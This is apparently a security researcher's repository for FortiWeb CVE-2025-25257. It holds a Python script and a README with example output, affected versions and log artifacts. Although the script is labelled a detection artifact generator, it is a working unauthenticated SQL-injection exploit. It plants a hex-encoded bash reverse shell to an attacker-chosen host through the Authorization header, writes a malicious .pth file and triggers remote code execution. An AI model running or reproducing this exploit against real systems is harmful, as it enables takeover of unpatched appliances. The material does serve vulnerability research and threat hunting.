├── watchTowr-vs-FortiWeb-CVE-2025-25257.py └── README.md /watchTowr-vs-FortiWeb-CVE-2025-25257.py: -------------------------------------------------------------------------------- 1 | import requests 2 | from requests.packages.urllib3.exceptions import InsecureRequestWarning 3 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 4 | import argparse 5 | import binascii 6 | import random 7 | from time import sleep 8 | banner = """ __ ___ ___________ 9 | __ _ ______ _/ |__ ____ | |_\\__ ____\\____ _ ________ 10 | \\ \\/ \\/ \\__ \\ ___/ ___\\| | \\| | / _ \\ \\/ \\/ \\_ __ \\ 11 | \\ / / __ \\| | \\ \\___| Y | |( <_> \\ / | | \\/ 12 | \\/\\_/ (____ |__| \\___ |___|__|__ | \\__ / \\/\\_/ |__| 13 | \\/ \\/ \\/ 14 | 15 | watchTowr-vs-FortiWeb-CVE-2025-25257.py 16 | 17 | (*) FortiWeb Unauthenticated SQLi to Remote Code Execution Detection Artifact Generator 18 | 19 | - Sina Kheirkhah (@SinSinology) of watchTowr (@watchTowrcyber) 20 | 21 | CVEs: [CVE-2025-25257] 22 | """ 23 | print(banner) 24 | 25 | parser = argparse.ArgumentParser(description='Detection Artifact Generator for CVE-2025-25257') 26 | parser.add_argument('--target', required=True, help='Target URL') 27 | parser.add_argument('--lhost', required=True) 28 | parser.add_argument('--lport', required=True) 29 | args = parser.parse_args() 30 | 31 | args.command = f"""import os; os.system('bash -c "/bin/bash -i >& /dev/tcp/{args.lhost}/{args.lport} 0>&1"')""" 32 | args.target = args.target.rstrip('/') 33 | 34 | s = requests.Session() 35 | s.verify = False 36 | 37 | def build_token_updates(encoded_hex: str, chunk_size: int = 10): 38 | if chunk_size % 2 != 0: 39 | print("[!] 
chunk size must be even bro") 40 | exit(1) 41 | 42 | chunks = [encoded_hex[i : i + chunk_size] 43 | for i in range(0, len(encoded_hex), chunk_size)] 44 | 45 | for idx, piece in enumerate(chunks): 46 | if idx == 0: 47 | sql = ( 48 | f"SET/**/token=UNHEX('{piece}')" 49 | ) 50 | else: 51 | sql = ( 52 | f"SET/**/token=CONCAT(token,UNHEX('{piece}'))" 53 | ) 54 | 55 | payload = ( 56 | f"Bearer '/**/;UPDATE/**/fabric_user.user_table/**/" 57 | f"{sql};SELECT/**/'1'" 58 | ) 59 | s.headers.update({'Authorization': payload}) 60 | s.get(f"{args.target}/api/fabric/device/status") 61 | print(f"[*] sprayed chunk #{idx+1}/{len(chunks)}:\t{piece!r}") 62 | sleep(1) 63 | 64 | encoded_command = binascii.hexlify(args.command.encode()).decode() 65 | build_token_updates(encoded_command) 66 | 67 | s.headers.update({ 68 | 'Authorization': f"Bearer '/**/UNION/**/SELECT/**/token/**/from/**/fabric_user.user_table/**/into/**/outfile/**/'../../lib/python3.10/site-packages/x.pth" 69 | }) 70 | 71 | s.get(f"{args.target}/api/fabric/device/status") 72 | 73 | print("\n[*] Pop thy shell!") 74 | s.headers.pop('Authorization', None) 75 | s.head(f"{args.target}/cgi-bin/ml-draw.py") -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # watchTowr-vs-FortiWeb-CVE-2025-25257 2 | 3 | Detection Artifact Generator for FortiWeb CVE-2025-25257 4 | 5 | 6 | See our [blog post](https://labs.watchtowr.com/) for technical details 7 | 8 | 9 | 10 | https://github.com/user-attachments/assets/e59f2b3b-2b9b-469f-b4a8-2b7df2ede194 11 | 12 | 13 | 14 | # Detection in Action 15 | 16 | ``` 17 | python watchTowr-vs-FortiWeb-CVE-2025-25257.py --target https://192.168.8.30/ --lhost 192.168.8.148 --lport 1350 18 | __ ___ ___________ 19 | __ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________ 20 | \ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \ 21 | \ / / __ \| | \ \___| Y | |( <_> \ / | | \/ 22 | \/\_/ 
(____ |__| \___ |___|__|__ | \__ / \/\_/ |__| 23 | \/ \/ \/ 24 | 25 | watchTowr-vs-FortiWeb-CVE-2025-25257.py 26 | 27 | (*) FortiWeb Unauthenticated SQLi to Remote Code Execution Detection Artifact Generator 28 | 29 | - Sina Kheirkhah (@SinSinology) of watchTowr (@watchTowrcyber) 30 | 31 | CVEs: [CVE-2025-25257] 32 | 33 | [*] sprayed chunk #1/17: '696d706f72' 34 | [*] sprayed chunk #2/17: '74206f733b' 35 | [*] sprayed chunk #3/17: '206f732e73' 36 | [*] sprayed chunk #4/17: '797374656d' 37 | [*] sprayed chunk #5/17: '2827626173' 38 | [*] sprayed chunk #6/17: '68202d6320' 39 | [*] sprayed chunk #7/17: '222f62696e' 40 | [*] sprayed chunk #8/17: '2f62617368' 41 | [*] sprayed chunk #9/17: '202d69203e' 42 | [*] sprayed chunk #10/17: '26202f6465' 43 | [*] sprayed chunk #11/17: '762f746370' 44 | [*] sprayed chunk #12/17: '2f3139322e' 45 | [*] sprayed chunk #13/17: '3136382e38' 46 | [*] sprayed chunk #14/17: '2e3134382f' 47 | [*] sprayed chunk #15/17: '3133353020' 48 | [*] sprayed chunk #16/17: '303e263122' 49 | [*] sprayed chunk #17/17: '2729' 50 | 51 | [*] Pop thy shell! 
52 | 53 | ``` 54 | 55 | # Description 56 | 57 | This script attempts to detect whether a FortiWeb instance is vulnerable to CVE-2025-25257. The check is not passive: it sends SQL through the `Authorization` header to `/api/fabric/device/status`, writes a `.pth` file into the appliance's Python `site-packages` directory, and then triggers a connect-back shell to `--lhost`/`--lport`, so the target is modified. Those three request patterns are also the artifacts to look for in web-server access logs and on the appliance's file system when hunting for prior exploitation. 58 | 59 | # Affected Versions 60 | 61 | The following versions of FortiWeb are affected: 62 | 63 | | Version | Affected | Solution | 64 | | ------------ | -------------------- | -------------------------- | 65 | | FortiWeb 7.6 | 7.6.0 through 7.6.3 | Upgrade to 7.6.4 or above | 66 | | FortiWeb 7.4 | 7.4.0 through 7.4.7 | Upgrade to 7.4.8 or above | 67 | | FortiWeb 7.2 | 7.2.0 through 7.2.10 | Upgrade to 7.2.11 or above | 68 | | FortiWeb 7.0 | 7.0.0 through 7.0.10 | Upgrade to 7.0.11 or above | 69 | 70 | For more information, see the [FortiGuard Labs PSIRT advisory](https://fortiguard.fortinet.com/psirt/FG-IR-25-151). 71 | 72 | 73 | # Follow [watchTowr](https://watchTowr.com) Labs 74 | 75 | For the latest security research, follow the [watchTowr](https://watchTowr.com) Labs Team: 76 | 77 | - https://labs.watchtowr.com/ 78 | - https://x.com/watchtowrcyber 79 | --------------------------------------------------------------------------------